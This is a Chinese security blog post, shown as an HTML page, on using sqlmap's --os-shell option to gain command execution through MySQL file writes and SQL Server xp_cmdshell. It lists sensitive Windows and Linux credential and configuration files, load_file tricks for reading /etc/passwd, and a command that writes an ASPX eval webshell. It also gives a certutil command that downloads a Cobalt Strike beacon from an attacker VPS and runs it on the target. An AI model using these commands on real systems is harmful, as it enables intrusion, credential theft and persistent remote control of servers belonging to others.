

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="yhy的个人博客">
  <meta name="author" content="yhy">
  <meta name="keywords" content="">
  
  <title>sqlmap关于os-shell小记 - yhy&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"fireline.fun","root":"/","version":"1.8.9","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":"https://hm.baidu.com/hm.js?613daf119ed9302ff8cc0e60daf78bfe","google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>YHY</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="sqlmap关于os-shell小记">
              
            </span>

            
              <div class="mt-3">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-author" aria-hidden="true"></i>
      yhy
    </span>
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-11-06 10:48" pubdate>
        2020年11月6日 上午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.6k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      21
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">sqlmap关于os-shell小记</h1>
            
              <p class="note note-info">
                
                  本文首发于微信公众号：<a target="_blank" href="https://gitee.com/yhy0/pic-go-img/raw/master/WX/20210320180703.jpg" rel="nofollow noopener noopener">谁不想当剑仙</a></br></br>本文最后更新于：2021年3月5日 上午
                
              </p>
            
            <div class="markdown-body">
              <h1 id="SqlMap-–os-shell-利用"><a href="#SqlMap-–os-shell-利用" class="headerlink" title="SqlMap –os-shell 利用"></a>SqlMap –os-shell 利用</h1><h2 id="MySQL"><a href="#MySQL" class="headerlink" title="MySQL"></a>MySQL</h2><h3 id="前提条件"><a href="#前提条件" class="headerlink" title="前提条件"></a>前提条件</h3><ol>
<li><p>拥有dba权限</p>
</li>
<li><p>网站的绝对路径</p>
</li>
<li><p>高版本的mysql需要 <code>show variables like &#39;%secure_file_priv%&#39;</code> 或者<code>select </code></p>
<p> <code>@@secure;</code>或者<code>show global variables like &#39;%secure%&#39;;</code>的结果符合要求，secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。这个参数只能通过修改配置文件后重启mysql修改</p>
<ul>
<li>如果该变量为空，则变量无效，这时候最容易利用</li>
<li>如果变量为目录的绝对路径，则服务器会将导入和导出操作限制为仅适用于该目录中的文件</li>
<li>如果设置为NULL，则服务器禁用导入和导出操作。</li>
</ul>
</li>
<li><p>当为php时，magic_quotes_gpc为off，php主动转义的功能关闭**</p>
</li>
</ol>
<p>当执行 –os-shell时，这个时候sqlmap主要做了三件事情：</p>
<ol>
<li>进行目标的一个基础信息的探测。</li>
<li>上传shell到目标web网站上（sqlmap会自动生成两个文件，一个用于命令执行，一个用于上传文件）</li>
<li>退出时删除shell。</li>
</ol>
<h3 id="寻找绝对路径"><a href="#寻找绝对路径" class="headerlink" title="寻找绝对路径"></a>寻找绝对路径</h3><ol>
<li><p>通过网站报错信息查看绝对路径</p>
</li>
<li><p>通过搜索引擎获取</p>
 <figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm">google语法：site:<span class="hljs-keyword">baidu.com </span>warning<br><span class="hljs-symbol">site:</span><span class="hljs-keyword">baidu.com </span> <span class="hljs-string">&quot;fatal error&quot;</span><br></code></pre></td></tr></table></figure></li>
<li><p>配置文件获取路径<br> 如果注入点有文件读取权限，就可以通过load_file函数读取配置文件，再从中寻找路径信息。</p>
</li>
</ol>
<p>  Sqlmap 下可以使用–sql-shell 获取一个sql命令执行窗口，使用load_file(‘文件名’)读取文件</p>
<p>  也可以使用 –file-read=文件名 ，读取文件</p>
<p>sqlmap -u ‘url’ –batch –file-read=/etc/httpd/conf/httpd.conf</p>
<ul>
<li><p><strong>win 下常见的敏感文件</strong></p>
<p><a href="https://link.zhihu.com/?target=https://blog.csdn.net/hardhard123/article/details/80062733">常用的绝对路径收集</a></p>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs taggerscript">c:/boot.ini //查看系统版本 <br>c:/windows/php.ini //php配置信息 <br>c:/windows/my.ini //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码 <br>c:/winnt/php.ini <br>c:/winnt/my.ini <br>c:<span class="hljs-symbol">\m</span>ysql<span class="hljs-symbol">\d</span>ata<span class="hljs-symbol">\m</span>ysql<span class="hljs-symbol">\u</span>ser.MYD //存储了mysql.user表中的数据库连接密码 <br>c:<span class="hljs-symbol">\P</span>rogram Files<span class="hljs-symbol">\R</span>hinoSoft.com<span class="hljs-symbol">\S</span>erv-U<span class="hljs-symbol">\S</span>ervUDaemon.ini //存储了虚拟主机网站路径和密码 <br>c:<span class="hljs-symbol">\P</span>rogram Files<span class="hljs-symbol">\S</span>erv-U<span class="hljs-symbol">\S</span>ervUDaemon.ini <br>c:<span class="hljs-symbol">\w</span>indows<span class="hljs-symbol">\s</span>ystem32<span class="hljs-symbol">\i</span>netsrv<span class="hljs-symbol">\M</span>etaBase.xml 查看IIS的虚拟主机配置 <br>c:<span class="hljs-symbol">\w</span>indows<span class="hljs-symbol">\r</span>epair<span class="hljs-symbol">\s</span>am //存储了WINDOWS系统初次安装的密码 <br>c:<span class="hljs-symbol">\P</span>rogram Files<span class="hljs-symbol">\S</span>erv-U<span class="hljs-symbol">\S</span>ervUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此 <br>c:<span class="hljs-symbol">\P</span>rogram Files<span class="hljs-symbol">\R</span>hinoSoft.com<span class="hljs-symbol">\S</span>ervUDaemon.exe <br>C:<span class="hljs-symbol">\D</span>ocuments and Settings<span class="hljs-symbol">\A</span>ll Users<span class="hljs-symbol">\A</span>pplication Data<span class="hljs-symbol">\S</span>ymantec<span class="hljs-symbol">\p</span>cAnywhere<span class="hljs-symbol">\*</span>.cif文件 <br>//存储了pcAnywhere的登陆密码 <br>c:<span class="hljs-symbol">\P</span>rogram Files<span class="hljs-symbol">\A</span>pache Group<span class="hljs-symbol">\A</span>pache<span class="hljs-symbol">\c</span>onf<span class="hljs-symbol">\h</span>ttpd.conf 或C:<span class="hljs-symbol">\a</span>pache<span class="hljs-symbol">\c</span>onf<span class="hljs-symbol">\h</span>ttpd.conf //查看WINDOWS系统apache文件 <br>c:/Resin-3.0.14/conf/resin.conf //查看jsp开发的网站 resin文件配置信息. <br>c:/Resin/conf/resin.conf/usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机 <br>d:<span class="hljs-symbol">\A</span>PACHE<span class="hljs-symbol">\A</span>pache2<span class="hljs-symbol">\c</span>onf<span class="hljs-symbol">\h</span>ttpd.conf <br>C:<span class="hljs-symbol">\P</span>rogram Files<span class="hljs-symbol">\m</span>ysql<span class="hljs-symbol">\m</span>y.ini <br>C:<span class="hljs-symbol">\m</span>ysql<span class="hljs-symbol">\d</span>ata<span class="hljs-symbol">\m</span>ysql<span class="hljs-symbol">\u</span>ser.MYD 存在MYSQL系统中的用户密码<br>c:<span class="hljs-symbol">\w</span>indows<span class="hljs-symbol">\p</span>hp.ini      php配置文件<br>c:<span class="hljs-symbol">\w</span>indows<span class="hljs-symbol">\s</span>ystem32<span class="hljs-symbol">\i</span>netsrv<span class="hljs-symbol">\M</span>etaBase.xml    IIS虚拟主机配置文件<br></code></pre></td></tr></table></figure></li>
<li><p><strong>Linux 下常见的敏感文件</strong></p>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs stata">/usr/<span class="hljs-keyword">local</span>/<span class="hljs-keyword">app</span>/apache2/<span class="hljs-keyword">conf</span>/httpd.<span class="hljs-keyword">conf</span> <span class="hljs-comment">//apache2缺省配置文件 </span><br>/usr/<span class="hljs-keyword">local</span>/apache2/<span class="hljs-keyword">conf</span>/httpd.<span class="hljs-keyword">conf</span> <br>/usr/<span class="hljs-keyword">local</span>/<span class="hljs-keyword">app</span>/apache2/<span class="hljs-keyword">conf</span>/extra/httpd-vhosts.<span class="hljs-keyword">conf</span> <span class="hljs-comment">//虚拟网站设置 </span><br>/usr/<span class="hljs-keyword">local</span>/<span class="hljs-keyword">app</span>/php5/lib/php.ini <span class="hljs-comment">//PHP相关设置 </span><br>/etc/sysconfig/iptables <span class="hljs-comment">//从中得到防火墙规则策略 </span><br>/etc/httpd/<span class="hljs-keyword">conf</span>/httpd.<span class="hljs-keyword">conf</span> <span class="hljs-comment">// apache配置文件 </span><br>/etc/rsyncd.<span class="hljs-keyword">conf</span> <span class="hljs-comment">//同步程序配置文件 </span><br>/etc/my.cnf <span class="hljs-comment">//mysql的配置文件 </span><br>/etc/redhat-release <span class="hljs-comment">//系统版本 </span><br>/etc/issue <br>/etc/issue.<span class="hljs-keyword">net</span> <br>/usr/<span class="hljs-keyword">local</span>/<span class="hljs-keyword">app</span>/php5/lib/php.ini <span class="hljs-comment">//PHP相关设置 </span><br>/usr/<span class="hljs-keyword">local</span>/<span class="hljs-keyword">app</span>/apache2/<span class="hljs-keyword">conf</span>/extra/httpd-vhosts.<span class="hljs-keyword">conf</span> <span class="hljs-comment">//虚拟网站设置 </span><br>/etc/httpd/<span class="hljs-keyword">conf</span>/httpd.<span class="hljs-keyword">conf</span>或/usr/<span class="hljs-keyword">local</span>/apche/<span class="hljs-keyword">conf</span>/httpd.<span class="hljs-keyword">conf</span> 查看linux APACHE虚拟主机配置文件<br>/usr/<span class="hljs-keyword">local</span>/resin-3.0.22/<span class="hljs-keyword">conf</span>/resin.<span class="hljs-keyword">conf</span> 针对3.0.22的RESIN配置文件查看 <br>/usr/<span class="hljs-keyword">local</span>/resin-<span class="hljs-keyword">pro</span>-3.0.22/<span class="hljs-keyword">conf</span>/resin.<span class="hljs-keyword">conf</span> 同上 <br>/usr/<span class="hljs-keyword">local</span>/<span class="hljs-keyword">app</span>/apache2/<span class="hljs-keyword">conf</span>/extra/httpd-vhosts.<span class="hljs-keyword">conf</span> APASHE虚拟主机查看 <br>/etc/httpd/<span class="hljs-keyword">conf</span>/httpd.<span class="hljs-keyword">conf</span>或/usr/<span class="hljs-keyword">local</span>/apche/<span class="hljs-keyword">conf</span>/httpd.<span class="hljs-keyword">conf</span> 查看linux APACHE虚拟主机配置文件 <br>/usr/<span class="hljs-keyword">local</span>/resin-3.0.22/<span class="hljs-keyword">conf</span>/resin.<span class="hljs-keyword">conf</span> 针对3.0.22的RESIN配置文件查看 <br>/usr/<span class="hljs-keyword">local</span>/resin-<span class="hljs-keyword">pro</span>-3.0.22/<span class="hljs-keyword">conf</span>/resin.<span class="hljs-keyword">conf</span> 同上 <br>/usr/<span class="hljs-keyword">local</span>/<span class="hljs-keyword">app</span>/apache2/<span class="hljs-keyword">conf</span>/extra/httpd-vhosts.<span class="hljs-keyword">conf</span> APASHE虚拟主机查看 <br>/etc/sysconfig/iptables 查看防火墙策略 <br>load_file(<span class="hljs-built_in">char</span>(47)) 可以列出FreeBSD,Sunos系统根目录 <br><span class="hljs-keyword">replace</span>(load_file(0×2F6574632F706173737764),0×3c,0×20) <br><span class="hljs-keyword">replace</span>(load_file(<span class="hljs-built_in">char</span>(47,101,116,99,47,112,97,115,115,119,100)),<span class="hljs-built_in">char</span>(60),<span class="hljs-built_in">char</span>(32))<br>etc/php.ini          php配置文件<br>/etc/httpd/<span class="hljs-keyword">conf</span>.<span class="hljs-keyword">d</span>/php.<span class="hljs-keyword">conf</span><br>/etc/httpd/<span class="hljs-keyword">conf</span>/httpd.<span class="hljs-keyword">conf</span>        Apache配置文件<br>/usr/<span class="hljs-keyword">local</span>/apache/<span class="hljs-keyword">conf</span>/httpd.<span class="hljs-keyword">conf</span><br>/usr/<span class="hljs-keyword">local</span>/apache2/<span class="hljs-keyword">conf</span>/httpd.<span class="hljs-keyword">conf</span><br>/usr/<span class="hljs-keyword">local</span>/apache/<span class="hljs-keyword">conf</span>/extra/httpd-vhosts.<span class="hljs-keyword">conf</span>  虚拟目录配置文件<br></code></pre></td></tr></table></figure></li>
<li><p><strong>通过执行</strong><code>select @@datadir;</code> 获取数据库数据保存的位置、 <code>select @@basedir;</code> 安装位置、<code>select @@plugin_dir</code> mysql plugin目录</p>
<p>可能会有一些关键信息，然后对关键信息搜索，查找默认路径    </p>
</li>
</ul>
<h3 id="执行–os-shell"><a href="#执行–os-shell" class="headerlink" title="执行–os-shell"></a>执行–os-shell</h3><p>成功后会在网站绝对路径下，生成两个文件，一个可以上传，一个可以执行命令。</p>
<p><img src="https://cdn.jsdelivr.net/gh/yhy0/PicGoImg@master/blog/sqlmap%E5%85%B3%E4%BA%8E-os-shell%E5%B0%8F%E8%AE%B0/20201106105940.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="SqlServer"><a href="#SqlServer" class="headerlink" title="SqlServer"></a>SqlServer</h2><h3 id="必要条件"><a href="#必要条件" class="headerlink" title="必要条件"></a>必要条件</h3><ul>
<li>数据库支持外连</li>
<li>数据库权限为SA权限</li>
</ul>
<p>Sqlserver –os-shell主要是利用<code>xp_cmdshell</code>扩展进行命令执行。</p>
<p>当执行–os-shell 时，这个时候sqlmap主要做了三件事情：</p>
<ol>
<li>识别当前数据库类型，然后打印出来。</li>
<li>检测是否为数据库dba，也就是查看是否为sa权限。</li>
<li>检测是否开启了xp_cmdshell，如果没有开启sqlmap就会尝试开启。</li>
</ol>
<h3 id="寻找绝对路径-1"><a href="#寻找绝对路径-1" class="headerlink" title="寻找绝对路径"></a>寻找绝对路径</h3><p>可以上传一个复杂文件名的文件，比如：l12asd3123_0sads7_08.jpg</p>
<p>或者在网站中找到一个复杂的文件名，觉得会是唯一的，通过命令查找</p>
<p>sqlmap  –os-shell 下使用，以下任意一条命令</p>
<figure class="highlight livescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs livescript"><span class="hljs-keyword">for</span> /r e:<span class="hljs-string">\</span> %i <span class="hljs-keyword">in</span> (<span class="hljs-number">1</span>*.php) <span class="hljs-keyword">do</span> @echo %i  *必加<br>dir c:<span class="hljs-string">\</span> d:<span class="hljs-string">\</span>  /s /b | find <span class="hljs-string">&quot;icon_assignment.gif&quot;</span><br></code></pre></td></tr></table></figure>

<p>查找文件</p>
<p><img src="https://cdn.jsdelivr.net/gh/yhy0/PicGoImg@master/blog/sqlmap%E5%85%B3%E4%BA%8E-os-shell%E5%B0%8F%E8%AE%B0/20201106110036.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="上一句话马或者连cs"><a href="#上一句话马或者连cs" class="headerlink" title="上一句话马或者连cs"></a>上一句话马或者连cs</h3><h4 id="写一句话木马"><a href="#写一句话木马" class="headerlink" title="写一句话木马"></a>写一句话木马</h4><p><code> echo ^&lt;%@ Page Language=&quot;Jscript&quot;%^&gt;^&lt;%eval(Request.Item[&quot;weshe11b&quot;],&quot;unsafe&quot;);%^&gt; &gt; d:\wwwroot\1azq.aspx</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/yhy0/PicGoImg@master/blog/sqlmap%E5%85%B3%E4%BA%8E-os-shell%E5%B0%8F%E8%AE%B0/20201106110059.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://cdn.jsdelivr.net/gh/yhy0/PicGoImg@master/blog/sqlmap%E5%85%B3%E4%BA%8E-os-shell%E5%B0%8F%E8%AE%B0/20201106110119.png" srcset="/img/loading.gif" lazyload></p>
<h4 id="上线CS"><a href="#上线CS" class="headerlink" title="上线CS"></a>上线CS</h4><p>使用 <code>certutil.exe -urlcache -split -f http://vpsIP:port/beacon32.exe a32.exe</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/yhy0/PicGoImg@master/blog/sqlmap%E5%85%B3%E4%BA%8E-os-shell%E5%B0%8F%E8%AE%B0/20201106110147.png" srcset="/img/loading.gif" lazyload></p>
<p>a32.exe 执行， 有时执行不成功饭是因为权限不够，可以下载到有执行权限的目录（假如c:/temp/ ，有权限，<code>certutil.exe -urlcache -split -f http://vpsIP:port/beacon32.exe c:/temp/a32.exe </code></p>
<p><img src="https://cdn.jsdelivr.net/gh/yhy0/PicGoImg@master/blog/sqlmap%E5%85%B3%E4%BA%8E-os-shell%E5%B0%8F%E8%AE%B0/20201106110212.png" srcset="/img/loading.gif" lazyload></p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>在有拥有dba权限后，</p>
<ul>
<li>mysql拿shell的难点在于寻找绝对路径</li>
<li>sqlserver在于xp_cmdshell 是否开启。</li>
</ul>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7/">安全工具</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/sqlmap%E4%BD%BF%E7%94%A8/">sqlmap使用</a>
                    
                      <a class="hover-with-bg" href="/tags/getshell/">getshell</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/01/11/SScan/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">SScan  一款src捡洞扫描器</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/08/04/%E7%AE%80%E5%8D%95docker%E9%80%83%E9%80%B8%E5%AD%A6%E4%B9%A0/">
                        <span class="hidden-mobile">简单dockers逃逸学习</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.lazyComments('valine', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', function () {
        new Valine({
          el: "#valine",
          app_id: "vID2hnAAj71HlTtLcwO4InbY-gzGzoHsz",
          app_key: "GB9a9tvf5zPbYaxUShE01qk1",
          placeholder: "说点什么",
          path: window.location.pathname,
          avatar: "robohash",
          meta: ["nick","mail","link"],
          pageSize: "10",
          lang: "zh-CN",
          highlight: true,
          recordIP: false,
          serverURLs: "https://vid2hnaa.lc-cn-n1-shared.com",
        });
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the
    <a target="_blank" href="https://valine.js.org" rel="nofollow noopener noopener">comments powered by Valine.</a>
  </noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->

  <div class="col-lg-7 mx-auto nopadding-x-md">
    <div class="container custom post-custom mx-auto">
      <img src="https://gitee.com/yhy0/pic-go-img/raw/master/WX/20210320180703.jpg" srcset="/img/loading.gif" lazyload class="rounded mx-auto d-block mt-5" style="width:150px; height:150px;">
    </div>
  </div>


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/yhy0" target="_blank" rel="nofollow noopener"><span>YHY</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      $('#local-search-input').on('click', function() {
        searchFunc(path, 'local-search-input', 'local-search-result');
      });
      $('#modalSearch').on('shown.bs.modal', function() {
        $('#local-search-input').focus();
      });
    })()
  </script>












  
    <!-- Baidu Analytics -->
    <script defer>
      var _hmt = _hmt || [];
      (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?https://hm.baidu.com/hm.js?613daf119ed9302ff8cc0e60daf78bfe";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
      })();
    </script>
  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
